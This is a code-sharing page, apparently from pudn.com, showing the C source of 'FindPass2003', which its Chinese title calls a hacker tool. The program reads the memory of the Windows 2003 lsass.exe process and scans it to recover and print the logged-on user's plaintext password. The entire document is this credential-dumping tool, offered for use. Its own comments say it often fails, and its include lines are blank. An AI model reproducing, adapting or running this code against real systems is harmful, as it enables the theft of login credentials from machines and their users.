FindPass2003.rar FindPass2003.c

www.pudn.com > FindPass2003.rar > FindPass2003.c
黑客工具FindPass2003源代码  
//********************************************************************************  
// Version: V1.0  
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method  
//          Used Is Pretty Unwise,But This May Be The Only Way To Review The  
//          Logon User's Password On Windows 2003.  
// Test PlatForm: Windows 2003  
// Compiled On: VC++ 6.0  
//********************************************************************************  
#include   
#include   
#include   
#define BaseAddress 0x002b5000        // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable  
 
char  Password[MAX_PATH] = {0};        // Store The Found Password  
 
// Function ProtoType Declaration  
//------------------------------------------------------------------------------------------------------  
BOOL  FindPassword(DWORD PID);  
int   Search(char *Buffer,const UINT nSize);  
DWORD GetLsassPID();  
BOOL  Is2003();  
//------------------------------------------------------------------------------------------------------  
// End Of Fucntion ProtoType Declaration  
 
int main()  
{  
 DWORD PID = 0;  
 
 
 if (!Is2003())        // Check Out If The Box Is 2003  
 {  
     printf("The Program Can't Only Run On Windows 2003 Platform\n");  
     return -1;  
 }  
 
 PID = GetLsassPID();        // Get The Lsass.exe PID  
 
 if (PID == 0)        // Fail To Get PID If Returning Zerom  
 {  
     return -1;  
 }  
 
 FindPassword(PID);        // Find The Password From Lsass.exe Memory  
 return 0;  
}  
// End main()  
 
//------------------------------------------------------------------------------------  
// Purpose: Search The Memory & Try To Get The Password  
// Return Type: int  
// Parameters:     
//           In: char *Buffer        --> The Memory Buffer To Search      
//          Out: const UINT nSize   --> The Size Of The Memory Buffer  
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",  
//       Since The Password Is Near The Above Location,But It's Not Always True That  
//       We Will Find The Magic String,Or Even We Find It,The Password May Be Located  
//       At Some Other Place.We Only Look For Luck  
//------------------------------------------------------------------------------------  
int Search(char *Buffer,const UINT nSize)  
{  
 UINT OffSet = 0;  
 UINT i = 0;  
 UINT j = 0 ;  
 UINT Count = 0;  
 if (Buffer == NULL)  
 {  
     return -1;  
 }  
 for (i = 0 ; i < nSize ; i++)  
 {  
     /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word  
        Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate  
        The Magic String,We Have To Do It Manually And Slowly  
     */  
     if (Buffer[i] == 'L')  
     {  
         OffSet = 0;  
         if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)  
         {  
             OffSet += strlen("LocalSystem") + 1;  
             if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)  
             {  
                 OffSet += strlen("Remote") + 1;  
                 if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)  
                 {  
                     OffSet += strlen("Procedure") + 1;  
                     if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)  
                     {  
                         i += OffSet;  
                         break;  
                     }  
                 }  
             }  
         }  
     }  
 }  
 if (i < nSize)  
 {  
     ZeroMemory(Password,sizeof(Password));  
     for (; i < nSize ; i++)  
     {  
         if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)  
         {  
             /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In  
             That Way  
             */  
             j = i + 7;  
             for (; j < nSize; j += 2)  
             {  
                 if (Buffer[j] >  0)  
                 {  
                     Password[Count++] = Buffer[j];  
                 }  
                 else  
                 {  
                     break;  
                 }  
             }  
             return i + 7;        // One Flag To Indicate We Find The Password  
         }  
     }  
 }  
 return -1;        // Well,We Fail To Find The Password,And This Always Happens  
}  
// End Search  
 
//------------------------------------------------------------------------------------  
// Purpose: To Get The Lsass.exe PID  
// Return Type: DWORD  
// Parameters:  None  
//------------------------------------------------------------------------------------  
DWORD GetLsassPID()  
{  
 HANDLE hProcessSnap;  
 HANDLE hProcess = NULL;  
 PROCESSENTRY32 pe32;  
 DWORD PID = 0;  
 
 hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);  
 if( hProcessSnap == INVALID_HANDLE_VALUE )  
 {  
     printf("Fail To Create Snap Shot\n");  
     return 0;  
 }  
 
 pe32.dwSize = sizeof(PROCESSENTRY32);  
 
 if( !Process32First(hProcessSnap, &pe32))  
 {  
     CloseHandle(hProcessSnap);     // Must clean up the snapshot object!  
     return 0;  
 }  
 
 do  
 {  
  if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)  
  {  
      PID = pe32.th32ProcessID;  
      break;  
  }  
 }while(Process32Next( hProcessSnap, &pe32));  
 
 CloseHandle( hProcessSnap);  
 return PID;  
}  
// End GetLsassPID()  
 
//------------------------------------------------------------------------------------  
// Purpose: To Find The Password  
// Return Type: BOOLEAN  
// Parameters:    
//           In: DWORD PID        ->        The Lsass.exe's PID  
//------------------------------------------------------------------------------------  
BOOL FindPassword(DWORD PID)  
{  
 HANDLE hProcess = NULL;  
 char   Buffer[5 * 1024] = {0};  
 DWORD  ByteGet = 0;  
 int    Found = -1;  
 
 hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID);        // Open Process  
 if (hProcess == NULL)  
 {  
     printf("Fail To Open Process\n");  
     return FALSE;  
 }  
 
 if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet))        // Read The Memory From Lsass.exe  
 {  
     printf("Fail To Read Memory\n");  
     CloseHandle(hProcess);  
     return FALSE;  
 }  
 
 CloseHandle(hProcess);  
    
 Found = Search(Buffer,ByteGet);        // Search The Password  
 if (Found >= 0)        // We May Find The Password  
 {  
     if (strlen(Password) > 0)        // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not  
     {  
         printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);  
     }  
 }  
 else  
 {  
     printf("Fail To Find The Password\n");  
 }  
 return TRUE;  
}  
// End FindPassword  
 
//------------------------------------------------------------------------------------  
// Purpose: Check If The Box Is Windows 2003  
// Return Type: BOOLEAN  
// Parameters:  None  
//------------------------------------------------------------------------------------  
BOOL Is2003()  
{  
 OSVERSIONINFOEX osvi;  
 BOOL b0sVersionInfoEx;  
 ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));  
 osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);  
 
 if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))  
 {  
     osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);  
 }  
 return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);  
}  
// End Is2003()  
// End Of File